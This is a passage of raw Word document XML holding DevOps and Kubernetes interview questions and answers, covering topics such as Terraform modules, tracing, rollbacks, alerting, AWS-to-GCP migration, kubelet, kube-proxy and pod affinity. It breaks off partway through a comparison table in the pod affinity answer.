        <w:t>A: Separate reusable modules from environment live code. Build small modules around ownership boundaries: network/VPC/subnets/firewall/NAT, IAM/service accounts/bindings, GKE/cluster/node pools, database/Cloud SQL/AlloyDB, observability/log sinks/alerts/dashboards. Keep modules generic and versioned, with clear inputs/outputs. In live environments, compose these modules with separate state where blast radius differs. Avoid one giant module that hides risky changes or forces unrelated resources to be planned and applied together.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q223. Today interview 2026-07-06 - Distributed tracing design: Design distributed tracing for a request flowing through multiple Kubernetes services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Instrument the ingress/API gateway and every service with OpenTelemetry. Generate or accept W3C traceparent at the edge, propagate it on HTTP/gRPC calls, and copy it into message attributes for async queues. Each service creates spans around inbound request handling, downstream calls, database queries, cache calls, and important business operations. Export spans through an OpenTelemetry Collector with consistent resource attributes like service.name, deployment.environment, version, namespace, and cluster. Use sampling carefully so errors and high-latency requests are retained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q224. Today interview 2026-07-06 - Rollback strategy: Design a rollback strategy for application and infrastructure changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For applications, use immutable image versions, canary or blue-green deployment, health checks, SLO gates, and automated rollback when error rate or latency crosses thresholds. Keep database migrations backward-compatible so old and new versions can run during rollback. For infrastructure, keep versioned Terraform modules, reviewed plan files, small blast-radius states, and a documented restore path from previous state or Git commit. Always define rollback triggers, owner, command/runbook, validation checks, and communication plan before a risky change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q225. Today interview 2026-07-06 - Feature-flag deployment: Design a feature-flag deployment strategy for production releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate deploy from release. Deploy code dark with the flag off, enable it first for internal users or a small tenant cohort, then ramp by percentage or segment while watching business and technical metrics. Flags need ownership, expiry dates, audit logs, default-safe behavior, and kill switches that work without redeploying. For critical paths, design flags to fail closed or fail to the old path, and include flag state in logs and traces so incidents can identify whether a request used the new behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q226. Today interview 2026-07-06 - Customer issue scenario: Customers report production issues but dashboards are inconclusive. What do you do first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by confirming and scoping impact: who is affected, what user journey, when it started, regions/tenants/versions, and error examples. Check recent changes, synthetic checks, support tickets, logs by correlation ID, ingress/load balancer metrics, dependency health, and business KPIs. If impact is real, open an incident, assign roles, communicate early, and choose a mitigation based on evidence. Do not wait for a perfect dashboard; use customer examples to drive log and trace investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q227. Today interview 2026-07-06 - Failing request across services: A request is failing across multiple Kubernetes services. How would you trace and debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from one failing request ID or trace ID. Follow the distributed trace to find the first failing or slow span, then inspect structured logs for that trace across services. Check ingress status codes, service endpoints, Pod readiness, Kubernetes events, recent deploys, config changes, network policies, and dependency health. If tracing is missing, reproduce with a generated correlation ID and follow logs hop by hop. Once mitigated, add instrumentation for the blind spot that slowed debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q228. Today interview 2026-07-06 - Alert fatigue scenario: Alerts are noisy and engineers ignore them. How would you fix the alerting system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat it as reliability debt. Export the alert list, group by owner/severity/frequency, identify top noisy alerts, and ask whether each one is actionable, customer-impacting, and tied to a runbook. Delete or downgrade non-actionable alerts, group correlated alerts, add durations, tune thresholds with historical data, and shift paging to SLO burn/user-impact alerts. Add an alert review process after every incident and a rule that every page must have an owner, runbook, and expected action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q229. Today interview 2026-07-06 - Similar scenario AWS IAM mapping: During AWS to GCP migration, how would you map IAM roles, service accounts, and secrets safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inventory IAM roles, policies, users, instance profiles, and secret usage in AWS. Map workload identities to GCP service accounts with least-privilege IAM roles, avoiding one broad shared account. Replace static keys with Workload Identity, Workload Identity Federation, or managed service identities where possible. Move secrets to Secret Manager with rotation and access logging. Validate access using test workloads and audit logs before cutover, and remove legacy AWS permissions only after GCP access is proven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q230. Today interview 2026-07-06 - Similar scenario database cutover: How would you plan database migration and cutover from AWS RDS to Cloud SQL or AlloyDB with minimal downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Assess engine/version compatibility, extensions, schema, data size, write rate, maintenance windows, and RPO/RTO. Use Database Migration Service or native replication where possible to perform initial load plus continuous replication. Run schema validation, row counts, checksums, query performance tests, backup/restore tests, and application compatibility tests. For cutover, freeze or drain writes briefly, let replication catch up, switch connection strings or traffic, validate critical transactions, and keep rollback to the original RDS path until confidence criteria are met.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q231. Today interview 2026-07-06 - Similar scenario NetworkPolicy rollout: How would you roll out default-deny Network Policies safely in an existing production cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Audit actual traffic first using flow logs, service mesh telemetry, or CNI observability. Add labels consistently, create allow policies for known ingress, egress, DNS, monitoring, and dependencies, then test in dev/staging. Roll out namespace by namespace, starting with low-risk services, with owners present and a fast revert command ready. Watch error rates, DNS failures, connection refused/timeouts, and application logs. Make admission policy require future workloads to declare network intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q232. Today interview 2026-07-06 - Similar scenario observability maturity: How would you know whether your observability setup is actually helping incidents instead of just collecting data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure outcomes, not tool count. Mature observability reduces MTTA and MTTR, detects user impact before customers report it, connects metrics/logs/traces by service and trace ID, has useful runbooks, and shows ownership. During postmortems, ask whether alerts were timely, dashboards answered the first questions, traces found the bottleneck, and logs were searchable. If engineers still jump across disconnected tools or rely on guesses, the setup is collecting data but not creating operational clarity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q233. Today interview 2026-07-06 - Similar scenario SLO alert tuning: How would you tune SLO burn-rate alerts for both fast outages and slow reliability degradation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use multi-window multi-burn-rate alerts. A short window with a high burn rate catches severe fast outages quickly, while a longer window with a lower burn rate catches slow degradation before the monthly budget is exhausted. Tune thresholds from historical error budget consumption and page only when both short and longer windows confirm the burn, reducing false positives. Route slower burns to tickets if they do not require immediate wake-up, but still make ownership and deadlines clear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q234. Today interview 2026-07-06 - Similar scenario trace sampling: How would you choose trace sampling and retention for high-traffic microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use head or tail sampling based on volume and debugging needs. Keep 100 percent of errors, high-latency requests, important customer journeys, and low-volume critical services. Sample normal high-volume success traffic at a lower rate to control cost. Retain detailed traces long enough for incident investigation and keep aggregated metrics longer. Document sampling rules so engineers understand why some normal requests may not have traces, and avoid dropping the exact traces needed for incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Kubernetes Fundamentals (101–200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q235. How Request Flows</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q236. What is a pod?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q237. Difference between pod and container?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q238. What is a deployment?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q239. Explain ReplicaSets.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q240. What is a StatefulSet?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q241. Explain DaemonSets.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q242. What is a Job in Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q243. Explain CronJobs.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q244. What is kube-apiserver?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q245. Explain etcd.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q246. What is kube-scheduler?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q247. A pod is created via kube-apiserver</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q248. Explain kube-controller-manager.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q249. What is kubelet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The kubelet is the primary node-level agent in Kubernetes that runs on every worker node and is responsible for making sure containers inside Pods are running as expected.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>If Kubernetes decides what should run, kubelet ensures it is actually running on the node.</w:t>
        <w:br/>
        <w:t>It is the bridge between the control plane and the container runtime.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kubelet does</w:t>
        <w:br/>
        <w:t>1. Pod execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Receives Pod specs from the API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures containers are created and running</w:t>
        <w:br/>
        <w:t>2. Container health monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously checks container status</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restarts containers if they fail (based on restart policy)</w:t>
        <w:br/>
        <w:t>3. Node registration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Registers the node with the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reports node health and resource usage</w:t>
        <w:br/>
        <w:t>4. Volume management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mounts and unmounts storage volumes for pods</w:t>
        <w:br/>
        <w:t>5. Status reporting</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sends pod and node status back to the API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Pod is scheduled on a node by kube-scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. API server sends pod spec to the node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. kubelet on that node receives the spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. kubelet instructs the container runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Containers are created and managed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. kubelet monitors and reports status continuously</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubelet vs container runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubelet = orchestrator agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * container runtime (e.g., containerd) = executes containers</w:t>
        <w:br/>
        <w:t>kubelet tells the runtime what to run.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities summary</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run pods on the node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitor and restart containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Report node/pod status</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manage storage and networking setup for pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs on every worker node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Communicates with kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Does NOT make scheduling decisions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Is essential for node operation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>The kubelet is a node-level agent in Kubernetes that runs on each worker node and ensures that the containers defined in Pod specifications are running and healthy by interacting with the container runtime and reporting status back to the control plane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q250. Explain kube-proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-proxy is a node-level networking component in Kubernetes that enables network communication to Services by routing traffic to the correct Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kube-proxy makes Kubernetes Services actually work by forwarding traffic from a Service IP to backend Pod IPs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it exists</w:t>
        <w:br/>
        <w:t>Pods are ephemeral (they can come and go), so their IPs change.</w:t>
        <w:br/>
        <w:t>kube-proxy solves this by providing a stable virtual IP (Service IP) and handling routing behind the scenes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kube-proxy does</w:t>
        <w:br/>
        <w:t>1. Watches Services and Endpoints</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously monitors the API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services (ClusterIP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Programs networking rules on the node</w:t>
        <w:br/>
        <w:t>Depending on mode, it creates rules using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * iptables (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IPVS (high performance mode)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Userspace mode (legacy)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Load balances traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributes requests across healthy pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performs simple round-robin / hashing depending on mode</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow example</w:t>
        <w:br/>
        <w:t>When a client hits a Service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Client sends request to Service IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. kube-proxy rules intercept it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Traffic is redirected to one of the backend Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Response is returned to client</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>If a Service has 3 Pods:</w:t>
        <w:br/>
        <w:t>Pod A</w:t>
        <w:br/>
        <w:t>Pod B</w:t>
        <w:br/>
        <w:t>Pod C</w:t>
        <w:br/>
        <w:t>kube-proxy ensures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requests to Service → distributed across A, B, C</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modes of kube-proxy</w:t>
        <w:br/>
        <w:t>1. iptables mode (default)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses Linux iptables rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fast and widely used</w:t>
        <w:br/>
        <w:t>2. IPVS mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kernel-based load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better performance at scale</w:t>
        <w:br/>
        <w:t>3. userspace mode (legacy)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Old implementation, rarely used today</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Implements Service networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintains routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures Service discovery works internally</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kube-proxy is NOT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It does NOT run containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It does NOT schedule pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It does NOT create services</w:t>
        <w:br/>
        <w:t>It only handles network routing logic on nodes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kube-proxy is a Kubernetes node agent that maintains network rules on each node to enable communication to Services by forwarding and load balancing traffic from a Service IP to the appropriate backend Pods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q251. What is CNI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q252. Explain CSI.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q253. What is CoreDNS?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q254. Explain node affinity.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q255. What is pod affinity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pod affinity in Kubernetes is a scheduling rule that tells the system to place a Pod close to other Pods that match certain labels.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Pod affinity controls “which pods should run together” on the same node or in the same topology (like a zone or rack).</w:t>
        <w:br/>
        <w:t>It is the opposite of spreading randomly across nodes—it helps group related workloads together.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why pod affinity is used</w:t>
        <w:br/>
        <w:t>You use it when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Two services communicate frequently (reduce latency)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Microservices need to be co-located</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Caching layers should stay close to application pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You want better network performance between pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Kubernetes scheduler checks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Labels on existing Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Your affinity rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Available nodes and topology constraints</w:t>
        <w:br/>
        <w:t>Then it tries to place the new Pod near matching Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>If you have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backend pods labeled: app=backend</w:t>
        <w:br/>
        <w:t>And you want frontend pods to run close to them:</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod affinity rule example</w:t>
        <w:br/>
        <w:t>affinity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podAffinity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requiredDuringSchedulingIgnoredDuringExecution:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - labelSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        matchExpressions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - key: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">          operator: In</w:t>
        <w:br/>
        <w:t xml:space="preserve">          values:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      topologyKey: "kubernetes.io/hostname"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What this means</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Find pods with label app=backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Schedule this pod on the same node (hostname level)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of pod affinity</w:t>
        <w:br/>
        <w:t>1. Required (hard rule)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod MUST be scheduled near matching pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If not possible → Pod stays Pending</w:t>
        <w:br/>
        <w:t>2. Preferred (soft rule)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduler tries to colocate pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If not possible → still schedules elsewhere</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>topologyKey (important concept)</w:t>
        <w:br/>
        <w:t>Defines how “close” is defined:</w:t>
        <w:br/>
        <w:t>Value</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubernetes.io/hostname</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>topology.kubernetes.io/zone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same availability zone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>topology.kubernetes.io/region</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same region</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod affinity vs node affinity</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod-to-pod placement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod-to-node placement</w:t>
